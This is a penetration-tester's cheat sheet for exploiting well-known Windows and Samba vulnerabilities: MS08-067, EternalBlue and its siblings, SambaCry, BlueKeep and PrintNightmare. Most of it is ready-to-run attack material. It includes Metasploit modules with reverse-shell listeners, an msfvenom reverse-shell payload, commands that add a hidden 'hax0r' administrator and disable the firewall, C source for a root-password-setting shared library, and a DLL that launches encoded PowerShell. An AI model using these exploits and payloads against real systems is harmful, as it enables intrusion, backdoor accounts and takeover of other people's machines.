Low-Hanging Fruits

net_api

CVE-2008-4250, MS08-067

Check:

$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check

Exploit:

msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalBlue

CVE-2017-0144, MS17-010

Unauthenticated (FuzzBunch + Wine)

$ python2 fbcli.py eternalblue --TargetIp 192.168.1.11
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Ping
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function RunDLL --DllPayload /tmp/createuser.dll --ProcessName spoolsv.exe
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Uninstall

Authenticated (Windows 2003 or R/W Pipe)

MSF

Check:

$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run

Exploit with:

msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalRomance / EternalSynergy / EternalChampion

Exploit with ms17_010_psexec:

msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

Exploit with ms17_010_command:

msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user hax0r Passw0rd! /add && net localgroup administrators hax0r /add"
msf > run

Manually

Send MSF payload and execute it with send_and_execute.py:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe

Or just execute commands on host via zzz_exploit.py (at least one named pipe must be accessible on target):

$ python zzz_exploit.py 192.168.1.11

zzz_exploit.py

def smb_pwn(conn, arch):
    service_exec(conn, r'cmd /c net user hax0r Passw0rd! /add && cmd /c net localgroup administrators hax0r /add && cmd /c netsh firewall set opmode disable')

For x86 EternalBlue shellcodes use AutoBlue-MS17-010 (very unstable).

A feature for grabbing registry secrets in one shot:

$ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch

SambaCry

CVE-2017-7494 (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)

MSF

msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run

Manually

Compile .so SUID shared library:

pwn.c

// gcc -shared -fPIC -o pwn.so pwn.c

#include <stdio.h>
#include <stdlib.h>

static void pwn() __attribute__((constructor));

void pwn() {
	setresuid(0,0,0);
	system("echo 'root:Passw0rd!'|chpasswd");
}

Get real share path on the target's filesystem:

$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path:    /home/snovvcrash/sharename

Upload pwn.so to target and then run the exploit:

$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7
$ source venv/bin/activate.sh
$ pip install -r requirements.txt
$ . venv/bin/activate
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''

BlueKeep

CVE-2019-0708

Check:

msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run

Exploit:

msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

PrintNightmare

CVE-2021-16751, CVE-2021-34527

Check

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/spooler.py

$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler

ItWasAllADream

https://github.com/byt3bl33d3r/ItWasAllADream

$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'

Exploit

C/C++

RCE (fork of the original repo):

https://github.com/afwu/PrintNightmare

LPE:

https://github.com/hlldz/CVE-2021-1675-LPE

Python

RCE:

Usage

Prepare an SMB share with anonymous authentication allowed (smbserver.py also works):
Generate an evil DLL: a С2 stager / add user to a privileged group (1, 2, 3, etc.) / invoke a custom command (see example below).
Run the exploit:

$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'

pwn.c

// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

// Default function that is executed when the DLL is loaded
void Entry() {
    system("powershell -enc <BASE64_PWSH_CODE>");
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

Leveraging PrintNightmare to Abuse RBCD and DCSync the Domainsnovvcrash@gh-pages:~$ _

C#

RCE + LPE:

https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare

PowerShell

LPE:

https://github.com/calebstewart/CVE-2021-1675

Reproducibility

Flowchart by @wdormann:

https://twitter.com/wdormann/status/1412906574998392840twitter.com

Mitigation

https://github.com/LaresLLC/CVE-2021-1675

Last updated 2 months ago

hashtagnet_api

hashtagEternalBlue

hashtagUnauthenticated (FuzzBunch + Wine)

hashtagAuthenticated (Windows 2003 or R/W Pipe)

hashtagMSF

hashtagManually

hashtagSambaCry

hashtagMSF

hashtagManually

hashtagBlueKeep

hashtagPrintNightmare

hashtagCheck

hashtagCrackMapExec

hashtagItWasAllADream

hashtagExploit

hashtagC/C++

hashtagPython

hashtagC#

hashtagPowerShell

hashtagReproducibility

hashtagMitigation

net_api

EternalBlue

Unauthenticated (FuzzBunch + Wine)

Authenticated (Windows 2003 or R/W Pipe)

MSF

Manually

SambaCry

MSF

Manually

BlueKeep

PrintNightmare

Check

CrackMapExec

ItWasAllADream

Exploit

C/C++

Python

C#

PowerShell

Reproducibility

Mitigation